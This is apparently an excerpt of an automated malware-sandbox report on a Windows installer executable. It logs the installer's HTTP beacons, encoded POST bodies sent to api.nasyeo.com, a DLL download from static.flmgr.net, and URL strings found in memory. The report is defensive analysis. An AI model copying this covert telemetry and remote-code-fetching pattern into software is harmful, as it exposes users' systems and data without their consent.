Source: global trafficHTTP traffic detected: POST /log/next HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: textPOST, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 328Host: api.nasyeo.comData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 79 59 34 71 32 4d 4d 58 30 76 67 79 68 49 56 72 55 54 56 66 2f 55 42 4f 65 4c 71 65 4f 7a 33 68 72 52 4b 69 64 52 63 48 46 6b 55 4b 6c 31 66 70 37 52 43 39 31 69 4e 47 46 2b 57 39 72 32 6e 36 71 78 54 66 44 55 2b 76 30 4a 57 5a 62 64 63 44 65 77 38 34 67 4b 39 34 32 45 6f 72 66 61 71 66 50 73 66 4c 6c 72 4f 4a 78 45 6d 65 79 71 48 30 37 42 35 42 6b 6a 71 2b 65 2f 49 47 75 55 4c 4b 59 4b 6c 53 39 71 62 34 73 49 41 54 46 6c 6d 2b 55 41 61 6c 75 37 4d 38 77 33 39 6f 79 56 73 32 2b 4f 79 6d 30 56 4b 42 31 43 6f 35 49 57 33 67 69 33 38 44 6d 2f 53 30 73 2b 57 64 42 45 41 2b 36 75 4e 68 6f 4b 79 74 67 58 78 61 39 43 69 58 46 72 4c 34 64 6c 74 43 39 43 73 48 58 75 75 4a 44 42 72 39 51 51 72 35 39 79 72 63 58 4a 46 70 71 7a 52 70 4c 2b 32 49 4a 75 41 63 76 58 6d 77 3d 3d Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1yY4q2MMX0vgyhIVrUTVf/UBOeLqeOz3hrRKidRcHFkUKl1fp7RC91iNGF+W9r2n6qxTfDU+v0JWZbdcDew84gK942EorfaqfPsfLlrOJxEmeyqH07B5Bkjq+e/IGuULKYKlS9qb4sIATFlm+UAalu7M8w39oyVs2+Oym0VKB1Co5IW3gi38Dm/S0s+WdBEA+6uNhoKytgXxa9CiXFrL4dltC9CsHXuuJDBr9QQr59yrcXJFpqzRpL+2IJuAcvXmw==
Source: global trafficHTTP traffic detected: GET /log/client/install?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer= HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/site_soft?Action=down_start&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/site_soft?Action=down_suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: POST /log/close HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: textPOST, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 328Host: api.nasyeo.com
Source: global trafficHTTP traffic detected: GET /log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer= HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: POST /log/close HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: textPOST, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 328Host: api.nasyeo.comData Raw: 75 41 6e 68 77 79 36 56 66 45 53 56 33 6e 66 42 4a 44 55 73 4d 45 70 5a 68 52 46 4b 4c 4f 51 54 53 68 52 68 68 36 33 76 75 46 6c 50 55 6c 70 34 36 6d 71 6e 6a 6e 7a 56 46 56 69 72 44 48 37 4b 42 36 6d 39 52 53 33 4d 76 66 32 4d 49 48 63 2f 6c 53 68 59 53 59 34 52 57 64 58 57 63 4b 37 45 6e 37 58 32 6c 42 6a 54 4a 44 4e 52 62 6c 6c 6f 65 71 6c 33 43 74 50 75 41 64 67 6c 65 6e 6c 2b 51 38 79 79 79 36 71 79 54 36 66 54 2f 4b 38 4f 44 73 53 4c 64 6a 44 6d 38 39 74 5a 39 64 33 53 72 75 54 57 2b 66 66 75 64 4c 39 68 4c 34 4a 73 6c 63 61 71 48 54 75 51 31 42 68 6b 2b 66 2b 2f 4f 43 36 46 4b 71 45 49 77 69 38 39 62 4e 6c 65 55 44 63 30 6d 75 46 51 50 77 6a 6f 4d 70 30 7a 70 34 7a 45 34 6d 2b 49 6e 54 30 52 4f 46 64 71 72 37 67 57 33 48 37 77 31 48 37 74 55 30 73 6d 53 4e 78 46 41 2b 6d 75 4d 41 4d 5a 30 66 41 62 37 36 39 41 2f 6a 5a 65 49 34 45 75 38 44 64 43 71 47 66 75 70 72 6a 4e 68 64 51 53 32 4e 52 4c 73 73 37 4e 55 63 69 72 52 6f 72 76 79 70 31 75 44 66 47 49 6d 33 61 65 Data Ascii: uAnhwy6VfESV3nfBJDUsMEpZhRFKLOQTShRhh63vuFlPUlp46mqnjnzVFVirDH7KB6m9RS3Mvf2MIHc/lShYSY4RWdXWcK7En7X2lBjTJDNRblloeql3CtPuAdglenl+Q8yyy6qyT6fT/K8ODsSLdjDm89tZ9d3SruTW+ffudL9hL4JslcaqHTuQ1Bhk+f+/OC6FKqEIwi89bNleUDc0muFQPwjoMp0zp4zE4m+InT0ROFdqr7gW3H7w1H7tU0smSNxFA+muMAMZ0fAb769A/jZeI4Eu8DdCqGfuprjNhdQS2NRLss7NUcirRorvyp1uDfGIm3ae
Source: global trafficHTTP traffic detected: POST /log/next HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: textPOST, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 360Host: api.nasyeo.com
Source: global trafficHTTP traffic detected: POST /v1/client/exts HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/plain, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 216Host: api.flmgr.net
Source: global trafficHTTP traffic detected: POST /v1/client/configs HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; )Host: api.flmgr.netContent-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /kit/KitTip.dll HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: static.flmgr.net
Source: global trafficHTTP traffic detected: GET /green/1.2.32.1.png HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: static.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=0&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&ChannelCode=2&Action=pc_server&InstallDate=2023-08-04 HTTP/1.1Host: api.flmgr.netAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&ChannelCode=2&Action=pc_server&InstallDate=2023-08-04 HTTP/1.1Host: api.flmgr.netAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=201&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=218&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=391&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=324&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=325&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=303&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002264&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002264&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox ViewIP Address: 104.192.108.19 104.192.108.19
Source: _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001ADB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.420609026.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599905174.0000000004948000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/
Source: _____NCM______2_10042231.exe, 00000000.00000003.420609026.0000000001A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/4AD
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/e
Source: _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/client/install?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCod
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/client/run?User=%s&Action=%s&InstallDate=%s&ChannelCode=%s&Ver=%s&UserEv=%d
Source: FLMgrTray.exeString found in binary or memory: http://api.flmgr.net/log/client/run?User=%s&InstallDate=%s&ChannelCode=%s&Ver=%s&StartMode=%d&OsVer=
Source: _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/client/site_soft?Action=down_start&User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ch
Source: _____NCM______2_10042231.exe, 00000000.00000003.660352806.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733942259.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661328262.000000000491C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/client/site_soft?Action=down_suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&Chan
Source: _____NCM______2_10042231.exe, 00000000.00000003.420756858.0000000001A7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/client/site_soft?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelC
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://api.flmgr.net/log/client/site_softhttp://api.flmgr.net/log/client/install
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/client/stay?User=%s&InstallDate=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=
Source: FLMgrTray.exeString found in binary or memory: http://api.flmgr.net/log/client/stay?User=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=pc_tray&StartMo
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/log/install_err?TaskId=%d&User=%s&InstallDate=%s&ChannelCode=%s&Ver=%sDisplayVe
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/m
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/sb
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://api.flmgr.net/v1/api/system
Source: _____NCM______2_10042231.exe, 00000000.00000003.528207931.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/api/system?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&Winver=10.0&We
Source: _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/configs
Source: _____NCM______2_10042231.exe, 00000000.00000003.538128273.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/configs1I
Source: _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/configs50
Source: _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/exts
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/extsp
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/soft/find_keyname?SoftID=%d
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/soft/find_keyname?SoftID=%d/taskidcurrentspeedremaintimestatuscodedow
Source: _____NCM______2_10042231.exe, 00000000.00000003.420756858.0000000001A7D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.420609026.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.420915268.0000000001A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net/v1/client/theme?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&Winver=10.0&
Source: _____NCM______2_10042231.exe, 00000000.00000003.599814629.00000000061B2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net:80
Source: _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net:80/v1/client/exts
Source: _____NCM______2_10042231.exe, 00000000.00000003.599814629.00000000061B2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.flmgr.net:80angfang-AREACUCC1-CACHE23
Source: _____NCM______2_10042231.exe, 00000000.00000003.528631713.0000000001ADB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com/
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com/api/getxtRunShowDelayTimeSilentCountCloseInstallFLSoftLeadWnd
Source: _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com/api/info
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com/log/adSOFTWARE
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com/log/close
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://api.nasyeo.com/log/closecommit
Source: _____NCM______2_10042231.exe, 00000000.00000003.528523771.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661015928.000000000625D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734490139.0000000006261000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733702466.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com/log/next
Source: _____NCM______2_10042231.exe, 00000000.00000003.538128273.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.528207931.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com/log/next0
Source: _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com:80/log/closeh
Source: _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.nasyeo.com:80/log/nextrs
Source: _____NCM______2_10042231.exe, 00000000.00000003.600782714.00000000061A9000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apisvchost.exe
Source: _____NCM______2_10042231.exe, 00000000.00000002.734607528.0000000006571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digic
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://client.flmgr.net/home/recommend?taskbar_closeget
Source: explorer.exe, 00000012.00000002.778872704.00007FFC1B439000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
Source: explorer.exe, 00000012.00000002.778872704.00007FFC1B439000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
Source: _____NCM______2_10042231.exe, 00000000.00000003.599814629.00000000061B2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: _____NCM______2_10042231.exe, 00000000.00000002.734607528.0000000006571000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
